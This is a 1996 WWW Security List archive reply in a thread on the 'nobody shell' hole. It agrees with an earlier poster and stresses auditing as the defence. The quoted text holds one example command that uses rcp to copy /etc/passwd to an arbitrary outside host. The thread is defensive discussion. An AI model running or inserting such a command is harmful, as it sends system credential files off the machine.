[3690] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (John Stewart)
Wed Dec 4 14:33:19 1996
To: Eli Beker <beker@ibm.net.il>
cc: www-security@ns2.rutgers.edu, John Stewart <jns@cisco.com>,
Andrea Di Fabio <fabio@cs.odu.edu>,
IBM Israel - Internet Unix Support Team <moked@ibm.net.il>
In-reply-to: Your message of "Wed, 04 Dec 1996 11:41:05 +0200."
<Pine.A32.3.95-heb-2.07.961204113005.27742J-100000@rex.ibm.net.il>
Date: Wed, 04 Dec 1996 09:03:40 -0800
From: John Stewart <jns@cisco.com>
Errors-To: owner-www-security@ns2.rutgers.edu
-> Yes, but what about:
->
-> system("/bin/rcp /etc/passwd Any_Host: &");
No argument from me. With my first answer, I addressed (to some
degree) the problem first seen. With my other two, I addressed the
problem as a whole :)
-> > 3. Audit.
-> >
-> Auditing, Auditing, Auditing, That's the solution key.
Absolutely.
--J
John Stewart (jns@cisco.com) | | Phone: +1.408.526.8499
Advanced Customer Systems ||| ||| FAX: +1.408.232.2399
Cisco Systems, Inc. .:|||||:..:|||||:. http://www.employees.org/~jns
Friends of Randal Schwartz: http://www.lightlink.com/fors/
